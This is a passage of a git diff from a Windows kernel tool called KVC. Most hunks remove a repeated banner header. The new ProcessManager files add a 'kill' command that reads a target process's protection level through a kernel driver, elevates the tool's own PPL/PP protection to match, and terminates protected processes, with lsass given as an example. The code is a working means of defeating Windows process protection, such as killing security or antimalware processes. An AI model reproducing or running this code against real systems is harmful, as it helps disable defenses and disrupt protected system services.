marek@wesolowski.eu.org - Phone : +48 607 440 283 (Tel/WhatsApp) - Date : 04-09-2025 - -*******************************************************************************/ - // KvcDrv.cpp #include "kvcDrv.h" #include "common.h" @@ -166,4 +141,4 @@ bool kvc::Write(ULONG_PTR address, DWORD valueSize, DWORD value) noexcept { DWORD bytesReturned = 0; return DeviceIoControl(m_deviceHandle.get(), RTC_IOCTL_MEMORY_WRITE, &memoryWrite, sizeof(memoryWrite), &memoryWrite, sizeof(memoryWrite), &bytesReturned, nullptr); -} \ No newline at end of file +} diff --git a/kvc/KvcDrv.h b/kvc/KvcDrv.h index 9ec0bef..3c56a43 100644 --- a/kvc/KvcDrv.h +++ b/kvc/KvcDrv.h @@ -54,7 +54,7 @@ public: bool Write16(ULONG_PTR address, WORD value) noexcept; bool Write32(ULONG_PTR address, DWORD value) noexcept; bool Write64(ULONG_PTR address, DWORD64 value) noexcept; - + private: // Smart handle wrapper for automatic cleanup struct HandleDeleter diff --git a/kvc/OffsetFinder.cpp b/kvc/OffsetFinder.cpp index 81fea02..5c6e7f7 100644 --- a/kvc/OffsetFinder.cpp +++ b/kvc/OffsetFinder.cpp @@ -1,28 +1,3 @@ -/******************************************************************************* - _ ____ ______ - | |/ /\ \ / / ___| - | ' / \ \ / / | - | . \ \ V /| |___ - |_|\_\ \_/ \____| - -The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, -offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived -as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation -of kernel-level primitives** for legitimate security research and penetration testing. - -KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows -security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware -Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures -that define these protections. - - ----------------------------------------------------------------------------- - Author : Marek Wesołowski - Email : marek@wesolowski.eu.org - Phone : +48 607 440 283 (Tel/WhatsApp) - Date : 04-09-2025 - -*******************************************************************************/ - // OffsetFinder.cpp #include "OffsetFinder.h" #include "Utils.h" diff --git a/kvc/ProcessManager.cpp b/kvc/ProcessManager.cpp new file mode 100644 index 0000000..efcf6ab --- /dev/null +++ b/kvc/ProcessManager.cpp @@ -0,0 +1,275 @@ +// ProcessManager.cpp +#include "ProcessManager.h" +#include "Controller.h" +#include "Utils.h" +#include +#include +#include +#include +#include +#include +#include + +extern volatile bool g_interrupted; + +// Helper function to check if string contains only digits (PID) +bool ProcessManager::IsNumericPid(std::wstring_view input) noexcept { + if (input.empty()) return false; + return std::all_of(input.begin(), input.end(), [](wchar_t c) { return iswdigit(c); }); +} + +// Find process PIDs by name using Windows toolhelp API +std::vector ProcessManager::FindProcessIdsByName(const std::wstring& processName) noexcept { + std::vector pids; + + HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); + if (hSnapshot == INVALID_HANDLE_VALUE) { + return pids; + } + + PROCESSENTRY32W pe; + pe.dwSize = sizeof(PROCESSENTRY32W); + + if (Process32FirstW(hSnapshot, &pe)) { + do { + std::wstring currentName = pe.szExeFile; + + // Remove .exe extension for comparison if present + if (currentName.size() > 4 && currentName.substr(currentName.size() - 4) == L".exe") { + currentName = currentName.substr(0, currentName.size() - 4); + } + + // Case-insensitive partial match + std::wstring lowerCurrent = currentName; + std::wstring lowerTarget = processName; + std::transform(lowerCurrent.begin(), lowerCurrent.end(), lowerCurrent.begin(), ::towlower); + std::transform(lowerTarget.begin(), lowerTarget.end(), lowerTarget.begin(), ::towlower); + + if (lowerCurrent.find(lowerTarget) != std::wstring::npos) { + pids.push_back(pe.th32ProcessID); + } + + } while (Process32NextW(hSnapshot, &pe)); + } + + CloseHandle(hSnapshot); + return pids; +} + +// Terminate process with automatic protection elevation +bool ProcessManager::TerminateProcessWithProtection(DWORD processId, Controller* controller) noexcept { + if (!controller) { + ERROR(L"Controller not available for protection elevation"); + return false; + } + + if (g_interrupted) { + INFO(L"Operation cancelled by user before termination"); + return false; + } + + std::wstring processName = Utils::GetProcessName(processId); + INFO(L"Attempting to terminate process: %s (PID %d)", processName.c_str(), processId); + + // Get target process protection level for self-elevation + auto kernelAddr = controller->GetProcessKernelAddress(processId); + bool needsSelfProtection = false; + std::wstring levelStr, signerStr; + + if (kernelAddr) { + auto targetProtection = controller->GetProcessProtection(kernelAddr.value()); + if (targetProtection && targetProtection.value() > 0) { + needsSelfProtection = true; + + UCHAR targetLevel = Utils::GetProtectionLevel(targetProtection.value()); + UCHAR targetSigner = Utils::GetSignerType(targetProtection.value()); + + levelStr = (targetLevel == static_cast(PS_PROTECTED_TYPE::Protected)) ? L"PP" : L"PPL"; + + switch (static_cast(targetSigner)) { + case PS_PROTECTED_SIGNER::Lsa: signerStr = L"Lsa"; break; + case PS_PROTECTED_SIGNER::WinTcb: signerStr = L"WinTcb"; break; + case PS_PROTECTED_SIGNER::WinSystem: signerStr = L"WinSystem"; break; + case PS_PROTECTED_SIGNER::Windows: signerStr = L"Windows"; break; + case PS_PROTECTED_SIGNER::Antimalware: signerStr = L"Antimalware"; break; + case PS_PROTECTED_SIGNER::Authenticode: signerStr = L"Authenticode"; break; + case PS_PROTECTED_SIGNER::CodeGen: signerStr = L"CodeGen"; break; + case PS_PROTECTED_SIGNER::App: signerStr = L"App"; break; + default: + INFO(L"Unknown signer type - attempting termination without self-protection"); + needsSelfProtection = false; + break; + } + + if (needsSelfProtection) { + INFO(L"Target process protection: %s-%s", levelStr.c_str(), signerStr.c_str()); + + if (!controller->SelfProtect(levelStr, signerStr)) { + INFO(L"Self-protection elevation failed: %s-%s (attempting termination anyway)", + levelStr.c_str(), signerStr.c_str()); + needsSelfProtection = false; + } else { + SUCCESS(L"Self-protection elevated to %s-%s", levelStr.c_str(), signerStr.c_str()); + } + } + } else { + INFO(L"Target process is not protected, proceeding with standard termination"); + } + } else { + INFO(L"Could not get kernel address for target process, proceeding without self-protection"); + } + + if (g_interrupted) { + INFO(L"Operation cancelled by user during protection setup"); + if (needsSelfProtection) { + controller->SelfProtect(L"none", L"none"); + } + return false; + } + + // Attempt process termination + HANDLE processHandle = OpenProcess(PROCESS_TERMINATE, FALSE, processId); + bool success = false; + + if (processHandle) { + BOOL result = TerminateProcess(processHandle, 0); + CloseHandle(processHandle); + success = (result != FALSE); + } else { + DWORD error = GetLastError(); + ERROR(L"Failed to open process for termination (error: %d)", error); + } + + // Cleanup self-protection + if (needsSelfProtection) { + if (!controller->SelfProtect(L"none", L"none")) { + ERROR(L"Failed to cleanup self-protection after termination"); + } else { + INFO(L"Self-protection cleaned up successfully"); + } + } + + return success; +} + +// Main command handler for process termination operations with protection elevation +void ProcessManager::HandleKillCommand(int argc, wchar_t* argv[], Controller* controller) noexcept { + if (argc < 3) { + PrintKillUsage(); + return; + } + + if (!controller) { + ERROR(L"Controller not available - cannot perform protected process termination"); + return; + } + + INFO(L"Starting process termination with automatic protection elevation..."); + + std::vector processIds; + if (!ParseProcessIds(argv[2], processIds)) { + ERROR(L"Failed to parse process ID/name list"); + return; + } + + if (processIds.empty()) { + ERROR(L"No valid process IDs or names provided"); + return; + } + + if (g_interrupted) { + INFO(L"Operation cancelled by user before processing"); + return; + } + + // Execute termination for each target process with protection elevation + int successCount = 0; + for (DWORD pid : processIds) { + if (g_interrupted) { + INFO(L"Operation cancelled by user during batch termination"); + break; + } + + if (controller->KillProcess(pid)) { + SUCCESS(L"Terminated PID: %u", pid); + successCount++; + } else { + ERROR(L"Failed to terminate PID: %u", pid); + } + } + + INFO(L"Kill operation completed: %d/%zu processes terminated", + successCount, processIds.size()); +} + +// Parse comma-separated process ID/name list with input validation +bool ProcessManager::ParseProcessIds(std::wstring_view pidList, std::vector& pids) noexcept { + std::wstring pidStr(pidList); + size_t pos = 0; + size_t start = 0; + + while (pos != std::wstring::npos) { + pos = pidStr.find(L',', start); + std::wstring token; + + if (pos != std::wstring::npos) { + token = pidStr.substr(start, pos - start); + start = pos + 1; + } else { + token = pidStr.substr(start); + } + + // Trim leading and trailing whitespace + size_t first = token.find_first_not_of(L" \t"); + if (first == std::wstring::npos) continue; + + size_t last = token.find_last_not_of(L" \t"); + token = token.substr(first, (last - first + 1)); + + if (token.empty()) continue; + + // Check if token is numeric (PID) or text (process name) + if (IsNumericPid(token)) { + try { + DWORD pid = std::wcstoul(token.c_str(), nullptr, 10); + if (pid == 0) { + ERROR(L"Invalid PID: %s (PID cannot be 0)", token.c_str()); + continue; + } + pids.push_back(pid); + } + catch (...) { + ERROR(L"Invalid PID format: %s", token.c_str()); + continue; + } + } + else { + // Process name - find matching PIDs using Toolhelp32 (will be handled by Controller later) + auto foundPids = FindProcessIdsByName(token); + if (foundPids.empty()) { + ERROR(L"No process found matching: %s", token.c_str()); + continue; + } + + INFO(L"Found %zu processes matching '%s'", foundPids.size(), token.c_str()); + for (DWORD pid : foundPids) { + pids.push_back(pid); + } + } + } + + return !pids.empty(); +} + +// Display command usage and examples +void ProcessManager::PrintKillUsage() noexcept { + std::wcout << L"Usage: kvc kill [,pid2|name2,pid3|name3,...]\n"; + std::wcout << L" Examples:\n"; + std::wcout << L" kvc kill 1234\n"; + std::wcout << L" kvc kill notepad\n"; + std::wcout << L" kvc kill total\n"; + std::wcout << L" kvc kill lsass # Protected process (auto-elevation)\n"; + std::wcout << L" kvc kill 1234,notepad,calc\n"; + std::wcout << L" kvc kill \"1234, notepad, 5678\"\n"; + std::wcout << L" Note: Automatically elevates protection level to match protected targets\n\n"; +} \ No newline at end of file diff --git a/kvc/ProcessManager.h b/kvc/ProcessManager.h new file mode 100644 index 0000000..cfe0fff --- /dev/null +++ b/kvc/ProcessManager.h @@ -0,0 +1,28 @@ +// ProcessManager.h +#pragma once + +#include "common.h" +#include +#include + +// Forward declaration to avoid circular includes +class Controller; + +// Process management operations with self-protection capabilities +class ProcessManager +{ +public: + ProcessManager() = delete; + ~ProcessManager() = delete; + + // Command line interface for process termination with Controller integration + static void HandleKillCommand(int argc, wchar_t* argv[], Controller* controller) noexcept; + +private: + // Command parsing and validation helpers + static bool ParseProcessIds(std::wstring_view pidList, std::vector& pids) noexcept; + static void PrintKillUsage() noexcept; + static bool TerminateProcessWithProtection(DWORD processId, Controller* controller) noexcept; + static bool IsNumericPid(std::wstring_view input) noexcept; + static std::vector FindProcessIdsByName(const std::wstring& processName) noexcept; +}; \ No newline at end of file diff --git a/kvc/ReportExporter.cpp b/kvc/ReportExporter.cpp index 7fc6ebc..bc2a8c4 100644 --- a/kvc/ReportExporter.cpp +++ b/kvc/ReportExporter.cpp @@ -1,28 +1,3 @@ -/******************************************************************************* - _ ____ ______ - | |/ /\ \ / / ___| - | ' / \ \ / / | - | . \ \ V /| |___ - |_|\_\ \_/ \____| - -The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, -offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived -as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation -of kernel-level primitives** for legitimate security research and penetration testing. - -KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows -security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware -Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures -that define these protections. - - ----------------------------------------------------------------------------- - Author : Marek Wesołowski - Email : marek@wesolowski.eu.org - Phone : +48 607 440 283 (Tel/WhatsApp) - Date : 04-09-2025 - -*******************************************************************************/ - #include "ReportExporter.h" #include "Controller.h" #include diff --git a/kvc/SelfLoader.cpp b/kvc/SelfLoader.cpp index 2fee2ef..a9c02f5 100644 --- a/kvc/SelfLoader.cpp +++ b/kvc/SelfLoader.cpp @@ -1,29 +1,4 @@ -/******************************************************************************* - _ ____ ______ - | |/ /\ \ / / ___| - | ' / \ \ / / | - | . \ \ V /| |___ - |_|\_\ \_/ \____| - -The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, -offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived -as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation -of kernel-level primitives** for legitimate security research and penetration testing. - -KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows -security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware -Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures -that define these protections. - - ----------------------------------------------------------------------------- - Author : Marek Wesołowski - Email : marek@wesolowski.eu.org - Phone : +48 607 440 283 (Tel/WhatsApp) - Date : 04-09-2025 - -*******************************************************************************/ - -// SelfLoader.cpp +// SelfLoader.cpp #include #include #include diff --git a/kvc/ServiceManager.cpp b/kvc/ServiceManager.cpp index f6bff84..22afd23 100644 --- a/kvc/ServiceManager.cpp +++ b/kvc/ServiceManager.cpp @@ -1,28 +1,3 @@ -/******************************************************************************* - _ ____ ______ - | |/ /\ \ / / ___| - | ' / \ \ / / | - | . \ \ V /| |___ - |_|\_\ \_/ \____| - -The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, -offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived -as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation -of kernel-level primitives** for legitimate security research and penetration testing. - -KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows -security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware -Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures -that define these protections. - - ----------------------------------------------------------------------------- - Author : Marek Wesołowski - Email : marek@wesolowski.eu.org - Phone : +48 607 440 283 (Tel/WhatsApp) - Date : 04-09-2025 - -*******************************************************************************/ - #include "ServiceManager.h" #include "Controller.h" #include "KeyboardHook.h" diff --git a/kvc/TrustedInstallerIntegrator.cpp b/kvc/TrustedInstallerIntegrator.cpp index 16abdbe..4db504f 100644 --- a/kvc/TrustedInstallerIntegrator.cpp +++ b/kvc/TrustedInstallerIntegrator.cpp @@ -1,28 +1,3 @@ -/******************************************************************************* - _ ____ ______ - | |/ /\ \ / / ___| - | ' / \ \ / / | - | . \ \ V /| |___ - |_|\_\ \_/ \____| - -The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, -offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived -as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation -of kernel-level primitives** for legitimate security research and penetration testing. - -KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows -security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware -Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures -that define these protections. - - ----------------------------------------------------------------------------- - Author : Marek Wesołowski - Email : marek@wesolowski.eu.org - Phone : +48 607 440 283 (Tel/WhatsApp) - Date : 04-09-2025 - -*******************************************************************************/ - #include "TrustedInstallerIntegrator.h" #include "common.h" #include diff --git a/kvc/Utils.cpp b/kvc/Utils.cpp index 6a43095..aac9ab7 100644 --- a/kvc/Utils.cpp +++ b/kvc/Utils.cpp @@ -1,28 +1,3 @@ -/******************************************************************************* - _ ____ ______ - | |/ /\ \ / / ___| - | ' / \ \ / / | - | . \ \ V /| |___ - |_|\_\ \_/ \____| - -The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, -offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived -as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation -of kernel-level primitives** for legitimate security research and penetration testing. - -KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows -security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware -Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures -that define these protections. - - ----------------------------------------------------------------------------- - Author : Marek Wesołowski - Email : marek@wesolowski.eu.org - Phone : +48 607 440 283 (Tel/WhatsApp) - Date : 04-09-2025 - -*******************************************************************************/ - // Utils.cpp - Fixed compilation issues with NtQuerySystemInformation #include "Utils.h" #include "common.h" diff --git a/kvc/Utils.h b/kvc/Utils.h index ddf9498..cc836a1 100644 --- a/kvc/Utils.h +++ b/kvc/Utils.h @@ -54,7 +54,7 @@ namespace Utils return sectionSignatureLevel & 0x0F; } - // String conversion functions with static caching + // String conversion functions with static caching for performance const wchar_t* GetProtectionLevelAsString(UCHAR protectionLevel) noexcept; const wchar_t* GetSignerTypeAsString(UCHAR signerType) noexcept; const wchar_t* GetSignatureLevelAsString(UCHAR signatureLevel) noexcept; @@ -75,8 +75,8 @@ namespace Utils }; ProcessDumpability CanDumpProcess(DWORD pid, const std::wstring& processName) noexcept; - - // Hex string processing utilities for kernel tools + + // Hex string processing utilities for kernel tools bool HexStringToBytes(const std::wstring& hexString, std::vector& bytes) noexcept; bool IsValidHexString(const std::wstring& hexString) noexcept; diff --git a/kvc/common.cpp b/kvc/common.cpp index 8dce31c..376a6f4 100644 --- a/kvc/common.cpp +++ b/kvc/common.cpp @@ -1,28 +1,3 @@ -/******************************************************************************* - _ ____ ______ - | |/ /\ \ / / ___| - | ' / \ \ / / | - | . \ \ V /| |___ - |_|\_\ \_/ \____| - -The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, -offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived -as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation -of kernel-level primitives** for legitimate security research and penetration testing. - -KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows -security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware -Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures -that define these protections. - - ----------------------------------------------------------------------------- - Author : Marek Wesołowski - Email : marek@wesolowski.eu.org - Phone : +48 607 440 283 (Tel/WhatsApp) - Date : 04-09-2025 - -*******************************************************************************/ - // common.cpp - Core system utilities and dynamic API management // Implements service management, system path resolution, and Windows API abstraction diff --git a/kvc/kvc_crypt.cpp b/kvc/kvc_crypt.cpp index 2be7583..a856387 100644 --- a/kvc/kvc_crypt.cpp +++ b/kvc/kvc_crypt.cpp @@ -1,28 +1,3 @@ -/******************************************************************************* - _ ____ ______ - | |/ /\ \ / / ___| - | ' / \ \ / / | - | . \ \ V /| |___ - |_|\_\ \_/ \____| - -The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, -offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived -as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation -of kernel-level primitives** for legitimate security research and penetration testing. - -KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows -security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware -Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures -that define these protections. - - ----------------------------------------------------------------------------- - Author : Marek Wesołowski - Email : marek@wesolowski.eu.org - Phone : +48 607 440 283 (Tel/WhatsApp) - Date : 04-09-2025 - -*******************************************************************************/ - // kvc_crypt.cpp #include #include diff --git a/kvc/kvc_crypt.vcxproj b/kvc/kvc_crypt.vcxproj index 39aad17..05a31f3 100644 --- a/kvc/kvc_crypt.vcxproj +++ b/kvc/kvc_crypt.vcxproj @@ -82,7 +82,7 @@ - + diff --git a/kvc/syscalls.cpp b/kvc/syscalls.cpp index 41324a0..e97d91a 100644 --- a/kvc/syscalls.cpp +++ b/kvc/syscalls.cpp @@ -1,28 +1,3 @@ -/******************************************************************************* - _ ____ ______ - | |/ /\ \ / / ___| - | ' / \ \ / / | - | . \ \ V /| |___ - |_|\_\ \_/ \____| - -The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research, -offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived -as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation -of kernel-level primitives** for legitimate security research and penetration testing. - -KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows -security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware -Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures -that define these protections. - - ----------------------------------------------------------------------------- - Author : Marek Wesołowski - Email : marek@wesolowski.eu.org - Phone : +48 607 440 283 (Tel/WhatsApp) - Date : 04-09-2025 - -*******************************************************************************/ - // syscalls.cpp #include "syscalls.h" #include